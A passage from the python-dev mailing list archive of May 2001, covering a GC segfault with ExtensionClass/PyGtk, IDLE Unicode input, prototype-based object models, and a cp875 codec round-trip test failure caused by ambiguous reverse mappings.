builtin___import__ (self=0x0, args=0x829651c) at ../Python/bltinmodule.c:31 #35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2838 #36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2801 #37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734 #38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc) at ../Python/ceval.c:346 #40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490 #41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754 #42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287 #43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", fullname=0xbfffeff0 "seg") at ../Python/import.c:1815 #44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec) at ../Python/import.c:1671 #45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522 #46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1563 #47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4) at ../Python/bltinmodule.c:31 #48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2838 #49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2801 #50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734 #51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4) at ../Python/ceval.c:346 #53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "", globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708) at ../Python/pythonrun.c:1045 #54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:570 #55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:510 #56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, filename=0x80a496d "", closeit=0, flags=0xbffff708) at ../Python/pythonrun.c:473 #57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320 #58 0x400831f0 in __libc_start_main () from /lib/libc.so.6 From guido at digicool.com Fri May 11 23:49:00 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 16:49:00 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST." <15100.20090.573866.569667@beluga.mojam.com> References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com> > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two > intersect somewhere. PyGtk provides a Python interface to the Gtk widget > get using ExtensionClasses. Any ideas how I should approach the problem? I > don't know either piece of code at all and the code that generates the > segfault isn't particularly small, not to mention which it uses the bleeding > edge Gtk stuff (which I doubt anyone on this list will have installed) and a > version of ExtensionClass patched by James Henstridge, the PyGtk author. > > Here's what I know: > > 1. Disabling gc gets rid of the segfault > 2. I only see the problem with importing a specific module that > subclasses the GtkTextView widget from the Python command line. If I > run it as a script from the shell prompt, I get no segfault. > 3. If I first import the gtk module, then import my module, I get no > segfault. > 4. Most changes I make to the module causing the problem cause the > problemm to disappear. > > All told, all this really tells me is I'm probably dealing with a > malloc/free problem of some sort. > > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. AFAIK, the latest version of Zope (which uses ExtensionClass extensively if not exclusively :-) works fine with Python 2.1. This suggests pointing a finger towards the PyGtk code... :-( --Guido van Rossum (home page: http://www.python.org/~guido/) From loewis at informatik.hu-berlin.de Fri May 11 22:53:55 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Fri, 11 May 2001 22:53:55 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Thanks to a bug report I got, I noticed for the first time that you cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell prompt, you may get >>> s='??' UnicodeError: ASCII encoding error: ordinal not in range(128) Likewise, when trying to save a file that has non-ASCII characters, you get a traceback. Now, I think I understand all the causes of the problem (Tkinter returning Unicode objects, and so on). However, I'm curious whether anybody has proposals on how to deal with it. For saving text files, if Python had an encoding directive, things might be easier :-) For the shell prompt, I've no idea how to solve this best. So any suggestions are welcome. Regards, Martin From fredrik at pythonware.com Sat May 12 00:18:27 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 00:18:27 +0200 Subject: [Python-Dev] status of pre? References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid> guido wrote: > > We could put a warning on using pre or pcre in 2.2, and remove it in > 2.3, hoping that /F fixes the recursion limit problems in the mean > time (weren't those related to the backtracking implementation)? 2.2 is to be released in october, right? I'm sure I could shake out the remaining bugs in my "stackless SRE" patch until then... Cheers /F From fredrik at effbot.org Sat May 12 01:03:10 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:03:10 +0200 Subject: [Python-Dev] Hats off to them! Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid> http://www.theregister.co.uk/content/4/18909.html "Microsoft Altair BASIC legend talks about Linux, CPRM and that very frightening photo ... His other passion, he tells us, is Python. "Hats off to them. It's an extremely well designed language. It's object orientated from the get-go. They've really succeeded there," he says, and commends it as the ideal teaching language. That used to be BASIC, of course" ... (no, it's not Bill) Cheers /F From fredrik at effbot.org Sat May 12 01:14:47 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:14:47 +0200 Subject: [Python-Dev] Hats off to them! References: <014a01c0da6e$93578ca0$e46940d5@hagrid> Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid> > "Hats off to them. It's an extremely well designed language. It's > object orientated from the get-go. They've really succeeded there," > he says, and commends it as the ideal teaching language. That > used to be BASIC, of course" reading on, I'm not sure why BASIC ever was the ideal teaching language: http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11 "One of the nice things about this BASIC is it has this so called direct mode. So you can PRINT 2 + 2. It prints the square root of ten" Cheers /F From sdm7g at Virginia.EDU Sat May 12 04:43:31 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 22:43:31 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> Message-ID: On Fri, 11 May 2001, Thomas Heller wrote: > I never looked at Self or other prototype based systems. > Is it really true that prototypes are a lot simpler than > metaclasses, but on the other hand more powerful? Definitely simpler: No classes, No metaclasses, only objects. Ignore for now the fact that a limited set of classes are handier for a statically type checked language and just consider dynamic languages, which is their proper domain. Prototype semantics basicalaly subsume class semantics. Any object can be an exemplar and fill the role of a class, and it can be used ONLY as a template and holder of shared behaviour, so it can be used like a class. [One of the self papers -- one which I haven't read -- is entitled "Self includes Smalltalk" -- and is, I believe, a demonstration that SmallTalk is sort of a subset of Self.] But you can also have finer grain classification and you can have object inheritance. ( This is handly in XlispStat, which is oriented towards statistics and analysis: you can have derived objects, for example different subsamples of the same population, or in my app, different energy spectra, along with derived and processed spectra with special rules for treatment: e.g. linear filtered spectra have a filter function or kernel, and if they are fit against reference spectra, they need to be fit against references that have had the same filter applied to them -- if none available create one from unfiltered samples -- and maybe a whole chain of derived data. In a class based system, you would have to manually maintain a separate linked list of objects, but in a prototype system they can all be cloned from their parent objects. ) The other plus for things like exploratory statistics is that you don't have to design a class hierarchy ahead of time -- it more concrete and less abstract than a class based system. Prototypes can also solve some of the sort of problems that Jim Fultons acquisition framework in Zope is designed to handle. (But it's been a while since I read that paper and I haven't used it, so I'm relying on my memory of thinking "Yeah -- that would be simpler with prototypes" ) You definitely don't have to worry about simulating the Prototype Pattern. (I've seen GUI systems in C++ that go thru a lot of code to add prototype-like behavior to C++ classes.) But -- unless I can figure a useful way to use it under the covers, it's not really a topic for python-dev. > The 'brain exploding properties' of metaclasses are IMO > only there because my brain cannot think easily in too > many recursion steps... It's just like spelling bananana -- the problem is to know when to stop! ;-) -- Steve Majewski From tim_one at email.msn.com Sat May 12 13:28:27 2001 From: tim_one at email.msn.com (Tim Peters) Date: Sat, 12 May 2001 07:28:27 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: I have a way to make dict lookup a teensy bit cheaper(*) that significantly reduces the number of collisions (which is much more valuable). This caused a number of std tests to fail, because they were implicitly relying on the order in which a dict's entries are materialized via .keys() or .items(). Most of these were easy enough to fix. The last failure remaining is test_unicode, and I don't know how to fix it. It's dying here: try: verify(unicode(s,encoding).encode(encoding) == s) except TestFailed: print '*** codec "%s" failed round-trip' % encoding except ValueError,why: print '*** codec for "%s" failed: %s' % (encoding, why) when encoding == "cp875". There's a bogus problem you have to worm around first: test_unicode neglected to import TestFailed, so it actually dies with NameError while trying the "except TestFailed" clause after verify() raises TestFailed. Once that's repaired, it's complaining about failing the round-trip encoding. The original character in s it's griping about is "?" (0x3f). cp875.py has this entry in its decoding_map dict: 0x003f: 0x001a, # SUBSTITUTE But 0x1a is not a *unique* value in this dict. There's also 0x00dc: 0x001a, # SUBSTITUTE 0x00e1: 0x001a, # SUBSTITUTE 0x00ec: 0x001a, # SUBSTITUTE 0x00ed: 0x001a, # SUBSTITUTE 0x00fc: 0x001a, # SUBSTITUTE 0x00fd: 0x001a, # SUBSTITUTE Therefore what appears associated with 0x1a in the derived encoding_map dict: encoding_map = {} for k,v in decoding_map.items(): encoding_map[v] = k may end up being any of the 7 decoding_map keys that map to 0x1a. It just so happened to map back to 0x3f before, but to 0xfd after the dict change, so "?" doesn't survive the round trip anymore. My knowledge of encoding internals is exceeded only by my mastery of file URLs under Windows , so I could sure use some help getting this repaired. I'd really like to check in the dict improvement (+ test repairs), but won't do it so long as it makes a std test fail. If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings winning the game, then iterating over decoding_map.items() in reverse sorted order would do the trick reliablly. But I don't know whether the ambiguity in cp875 is a bug or an undocumented feature ... 7-bit-ascii-looks-better-every-day-ly y'rs - tim (*) Simply by taking the damn "~" off "~hash" -- I explained quite a while ago why that can lead to a weak form of clustering "in theory", and instrumenting the dict lookup code confirmed that it does hurt in real life. From guido at digicool.com Sat May 12 14:28:23 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 07:28:23 -0500 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400." References: Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Do prototype-based language have the equivalence of multiple inheritance? --Guido van Rossum (home page: http://www.python.org/~guido/) From tim_one at email.msn.com Sat May 12 14:16:33 2001 From: tim_one at email.msn.com (Tim Peters) Date: Sat, 12 May 2001 08:16:33 -0400 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Just as for class-based languages, whether a prototype-based language supports an MI workalike varies by language. In a class-based language with MI, a class can have multiple base classes; in a prototype-based language with an MI workalike, an object can have multiple prototype objects. The same kinds of ambiguities can arise, and the same kinds of resolution strategies are applicable (imposed linearization; user-supplied qualification; user-supplied renaming; guessing <0.7 wink>). JavaScript is the best-known prototype language that does not support multiple prototypes per object. A very readable intro to its object model is here: http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf It's interesting because, near the end, the author explores a bit how far you can get *trying* to fake MI in JS. The answer is "farther than you might think", but not all the way. From fredrik at pythonware.com Sat May 12 14:25:43 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 14:25:43 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? References: Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid> tim wrote: > If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings > winning the game, then iterating over decoding_map.items() in reverse sorted > order would do the trick reliably. reverse sorting makes sense to me. but the cp-files appear to be machine generated, so patching that python file won't help. > But I don't know whether the ambiguity in cp875 is a bug or an undocumented > feature ... a truly future-proof solution would be to specify exactly how to resolve every many-to-one mapping, for every font having that problem. but sorting them is clearly better than relying on implementation-dependent behaviour... (is Jython using exactly the same hashing and dictionary algorithms as CPython? or does it work by accident also under Jython?) Cheers /F From nas at python.ca Sat May 12 16:28:54 2001 From: nas at python.ca (Neil Schemenauer) Date: Sat, 12 May 2001 07:28:54 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500 References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <20010512072854.A4271@glacier.fnational.com> skip at pobox.com wrote: > > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. Do any of the PyGtk objects define the GC type flag? The GC is fairly good a exposing memory management bugs that otherwise go unnoticed. If you're using glib you can try setting the MALLOC_CHECK_ environment variable to 2. If you've got lots of memory you could also try using electric fence and running your program. Finally, you might try compiling with Py_DEBUG set. > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. I'd be willing to take a look (the chances of me reproducing it don't look good). A public RSA key is attached. Neil 1024 35 137239219965727437168672191918903379374375693016714793361229775412659825927393161529979393960653570460772264478344617383839228413657344788196731901259658832080205387752175259876861415566787275112151657197829855666024930817293398722707127849748769398037860296053992448539154897117015626552934877126704135564999 nas -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available URL: From sdm7g at Virginia.EDU Sat May 12 17:07:06 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 11:07:06 -0400 (EDT) Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Yeah ... What Tim said... Also: There are two basic implementation models: Delegation [a.k.a. "Lifetime sharing", cloning] sort of like python -- if you don't know how to handle it "ask" a parent object. ( "ask" in quotes, because I've recently been in a long argument about whether objective-C & smalltalk can really be said to "send messages" , or if it's "just" dynamic lookup and function application! ) Extension [a.k.a. "Birth sharing", copying, concatenation ] more like how I imaging C++ vtables are built -- the python equivalent would be like merging all of the class __dict__'s together with name-clase priority going to the nearest relative. ( "Life Sharing" vs. "Birth Sharing" -- is a change in the base class after object creation inherited by the object? ) I think most Multiple-Inheritance languages use delegation, but no reason it won't work in extension. The diff is that in extension, everything has to get resolved at object creation. Extension could be made more flexible if on creation, you could not only add new methods, but rearrange and control the extension process ( sort of like "from xxx import yyy; from aaa import bbb" ). I would think one could use delegation by default, but provide an extension mechanism as an optimization, but I don't know if there's any system that does this. If it follows the paradigm, a prototype system doesn't have an 'isa' or '__class__' slot -- only a (linked) list of parent objects. But if you were simulating class orientation, one would add an 'isa' slot for the immediate prototype, and probably enforce some restrictions on the prototype objects that were playing the role of class objects. "If it follow the paradigm" -- as in OO in general, there are several flavors and implementations and some are may be hybrid systems. Self is the language most widely known as a prototype based language: some others: Newtonscript (from apple's late lamented Newton palmtop), Kevo (a forth based o-o language), Cardelli's Obliqu (This didn't stick in my mind from when I read the papers back in the "safe python" development days, but it's listed in my book.) as well as XlispStat's object system. (which isn't listed in that book but there is an ObjectLisp -- I don't know if they were at all related. ) -- and Tim said JavaScript. The Amulet and Garnet GUI systems are prototype based -- Garnet written in Lisp and Amulet in C++. For NewtonScript, Kevo, and maybe JavaScript, I suspect the simplicity of the system was a motivation. ("the book" I'm reading is "Prototype-Based Programming -- Concepts, Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan Moore, pub. Springer. A collection of papers, some of which are available on the Web -- I know the Self papers, one description of NewtonScript, and one or two articles on Kevo are online, as well as Cardelli's Obliq paper. ) -- "Steve" Majewski From martin at loewis.home.cs.tu-berlin.de Sat May 12 21:16:58 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 21:16:58 +0200 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> > Has anyone investigated interactions between ExtensionClass objects > and GC? At some point, extension classes used a literal copy of PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, and only had the spare fields that were expected then. Today, PyTypeObject has much more fields, so extension objects produce random errors (eg. with GC) when used in a modern interpreter (where the copy has not been synchronized). Whatever immediately follows the type object in memory may be interpreted as GC flag. Regards, Martin From guido at digicool.com Sat May 12 23:08:05 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:08:05 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200." <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> > At some point, extension classes used a literal copy of > PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, > and only had the spare fields that were expected then. Today, > PyTypeObject has much more fields, so extension objects produce random > errors (eg. with GC) when used in a modern interpreter (where the copy > has not been synchronized). Whatever immediately follows the type > object in memory may be interpreted as GC flag. Not quite true. ExtensionClasses (at least recent versions that worked with 1.5.2) contain a copy of the type object up to and including the tp_flags field, and the 2.1 code is careful not to use any newer fields without first checking the corresponding flag bit. Now, if you are using the 1.4 version of ExtensionClasses you might not have the tp_flags field either (I don't know, I can't easily check) but the 1.5.2-compatible version of ExtensionClasses doesn't even require recompilation to work with Python 2.1. --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Sat May 12 22:12:39 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 22:12:39 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> > But I don't know whether the ambiguity in cp875 is a bug or an > undocumented feature The official (as in "as official as it gets") mapping between CP 875 and Unicode is at http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT This is also the file which served as an input to generate cp875.py. Character 1A, which is the mapping result of these characters, is indeed known with the name "SUBSTITUTE", apparently following the definition in http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm # substitute character (SUB): A control character that is used in the # place of a character that is recognized to be invalid or in error or # that cannot be represented on a given device. That would suggest that these characters in EBCDIC 875 do not have equivalents in Unicode. However, http://www.kostis.net/charsets/ebc875.htm suggests that the characters in question (3F, DC, E1, EC, ED, FC, and FD) have no character meaning at all. It seems that IBM's ICU library also maps U+001A to character 3F, see http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup It appears, from looking at http://www.natural-innovations.com/boo/asciiebcdic.html that byte 3F *is* the substitution character in EBCDIC. So it is a bug in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC character which is mapped to SUBSTITUTE; I think cp875 should be corrected to always map U+001A to 3F. That is not something the generator can currently do, though. So I think we can take one of two approaches: 1. admit that CP 875 is not round-trippable, and exclude it from the test (although when looking at the first 128 characters only, it is round-trippable). 2. remove the SUBSTITUTE mappings from CP875, acknowledging that apparently these characters have no meaning in that code page. Unfortunately, I could not find any official IBM documentation page that lists the characters supported in each of the EBCDIC code pages. The second seems to be more corrrect to me, although it is a deviation from the Unicode consortium publications. Regards, Martin From guido at digicool.com Sat May 12 23:21:21 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:21:21 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400." References: Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> > Also: There are two basic implementation models: > > Delegation [a.k.a. "Lifetime sharing", cloning] > sort of like python -- if you don't know how to handle it "ask" > a parent object. ( "ask" in quotes, because I've recently been > in a long argument about whether objective-C & smalltalk can > really be said to "send messages" , or if it's "just" dynamic > lookup and function application! ) > > Extension [a.k.a. "Birth sharing", copying, concatenation ] > more like how I imaging C++ vtables are built -- the python > equivalent would be like merging all of the class __dict__'s > together with name-clase priority going to the nearest > relative. > > ( "Life Sharing" vs. "Birth Sharing" -- is a change in the > base class after object creation inherited by the object? ) Interesting. So is the rest of this thread, but since Python is not a prototype language and is unlikely to become one, I'd like to mention that Python 2.2 will likely allow you to choose either paradigm, on a per-class basis, using metaclasses. I'm finding metaclasses in Python useful for different things than they are in Smalltalk, and I expect that they will continue to play a less important role. But they are important because they control many "policy" aspects of Python classes/types: e.g. whether instances have a __dict__ or a specific set of slots (maybe even typed slots), whether changes can be made to a class after it's been created, the semantics of multiple inheritance, and so on. Right now, my metaclasses continue to be implemented in C, although I expect that eventually they will be subclassable in Python. Watch the descr-branch in the CS tree. I hope I'll soon have some time to write a PEP, too. It's an interesting journey! The book I am reading about this: "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. http://cseng.awl.com/book/0,3828,0201433052,00.html --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g at Virginia.EDU Sat May 12 22:53:26 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 16:53:26 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> Message-ID: On Sat, 12 May 2001, Guido van Rossum wrote: > Interesting. So is the rest of this thread, but since Python is not a > prototype language and is unlikely to become one, I'd like to mention > that Python 2.2 will likely allow you to choose either paradigm, on a > per-class basis, using metaclasses. As I said earlier: the only advantage would be if it could simplify things "under the hood" (compared to metaclasses) but could still provide the same Class semantics (with maybe a "proto" declaration sneaking it's nose in under the tent.) But I have no immediate idea on how to do that, and it sounds like you're pretty far along into an implementation already. > I'm finding metaclasses in Python useful for different things than > they are in Smalltalk, and I expect that they will continue to play a > less important role. But they are important because they control many > "policy" aspects of Python classes/types: e.g. whether instances have > a __dict__ or a specific set of slots (maybe even typed slots), > whether changes can be made to a class after it's been created, the > semantics of multiple inheritance, and so on. I guess my practical quesion, which I meant to ask before I got myself sidetracked into preaching prototypes is: How much of the existing plumbing (specifically the Don Beaudry hack) can I rely on in the future for the objective-C/python bridge ? With BOOST and Zope's extension classes relying on it, can I assume that it's being extended rather than replaced ? ( I guess I ought to take a look at the code! ) > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html Thanks for the reference. Talking about interesting journies: Guido: did you ever imagine back at that first workshop at NIST that you and Python would be where you are today ? -- Steve Majewski From gmcm at hypernet.com Sat May 12 23:09:41 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Sat, 12 May 2001 17:09:41 -0400 Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> References: Your message of "Sat, 12 May 2001 11:07:06 -0400." Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost> [Guido] > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html The two things that struck me most when I read that last year: - How eminently ill-suited C++ is for this stuff (the book develops a framework in C++) - a very convincing argument that if you derive C from A and B (whose metaclasses are not the same), the system must derive a metaclass for C, using MI from A and B's metaclasses. duct-tape-skull-cap-advised-ly y'rs - Gordon From tim.one at home.com Sat May 12 23:22:49 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 12 May 2001 17:22:49 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: [/F] > reverse sorting makes sense to me. but the cp-files appear to be > machine generated, so patching that python file won't help. Agreed. > a truly future-proof solution would be to specify exactly how to > resolve every many-to-one mapping, for every font having that > problem. but sorting them is clearly better than relying on > implementation-dependent behaviour... The attached program suggests the problem is rare; of those encoding files that have a Python decode_map dict, only these triggered a meaningful ambiguity complaint: *** cp1006.py maps 0xfe8e back to 0xb1, 0xb2 *** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd Then since test_unicode only checks for roundtrip across range(0x80), cp875 is the only one that *can* fail (the ambiguities in cp1006 are for points > 0x7f, so aren't tested here). Hmm! Now I see that in a part of test_unicode that wasn't reached, cp875 and cp1006 are excluded, with this comment: ### These fail the round-trip: #'cp1006', 'cp875', 'iso8859_8', So the practical hack for now is to exclude cp875 from the earlier range(128) roundtrip test too. > (is Jython using exactly the same hashing and dictionary algorithms as > CPython? or does it work by accident also under Jython?) Sorry, no idea. Attempting to browse the Jython source on SourceForge caused this cute behavior: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/ Python Exception Occurred Traceback (innermost last): File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ? main() File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main view_directory(request) File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory fileinfo, alltags = get_logs(full_name, rcs_files, view_tag) File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs raise 'error during rlog: '+hex(status) error during rlog: 0x100 let's-rewrite-it-in-php-ly y'rs - tim ENCODING_DIR = "../Lib/encodings" import os import imp def d(w): if type(w) is type(6): return hex(w) else: return repr(w) encfiles = [name for name in os.listdir(ENCODING_DIR) if name.endswith(".py") and name[0] != "_"] for fname in encfiles: path = os.path.join(ENCODING_DIR, fname) f = open(path) module = imp.load_source(fname[:-3], path, f) f.close() decode = getattr(module, "decoding_map", None) if decode is None: print fname, "doesn't have decoding_map." continue vtok = {} for k, v in decode.items(): if v in vtok: vtok[v].append(k) else: vtok[v] = [k] ambiguous = [(v, ks) for v, ks in vtok.items() if len(ks) > 1] if ambiguous: for v, ks in ambiguous: ks.sort() print "***", fname, "maps", d(v), "back to", \ ", ".join(map(d, ks)) else: print fname, "is free of ambiguous reverse maps." From tim.one at home.com Sat May 12 23:48:38 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 12 May 2001 17:48:38 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, whose encyclopedic knowledge of encoding details still isn't enough to get a clear answer (it's like somebody asking me for a simple answer to a floating point question ] > ... > So I think we can take one of two approaches: > > 1. admit that CP 875 is not round-trippable, and exclude it from the > test (although when looking at the first 128 characters only, it > is round-trippable). As I noted later, 875 is already excluded from the roundtrip test across range(128, 256). What it's failing is the roundtrip test across range(128): after unicode("?", "cp875") produces u'\x1a', the following .encode('c875') has no way to know which range the original input came from. So it's not really round-trippable across range(128) either unless more info is given to .encode(). > 2. remove the SUBSTITUTE mappings from CP875, acknowledging that > apparently these characters have no meaning in that code page. > Unfortunately, I could not find any official IBM documentation > page that lists the characters supported in each of the EBCDIC > code pages. > > The second seems to be more corrrect to me, although it is a deviation > from the Unicode consortium publications. Until you and MAL agree on the best thing to do (I have no opinion: my only exposure to Unicode in daily programming life remains the Python test suite), I'm going to opt for #1: as cp875.py stands today, it's simply a fact that it's not round-trippable across any range including 0x3f. From martin at loewis.home.cs.tu-berlin.de Sun May 13 00:32:10 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 00:32:10 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> > Now, if you are using the 1.4 version of ExtensionClasses you might > not have the tp_flags field either (I don't know, I can't easily > check) but the 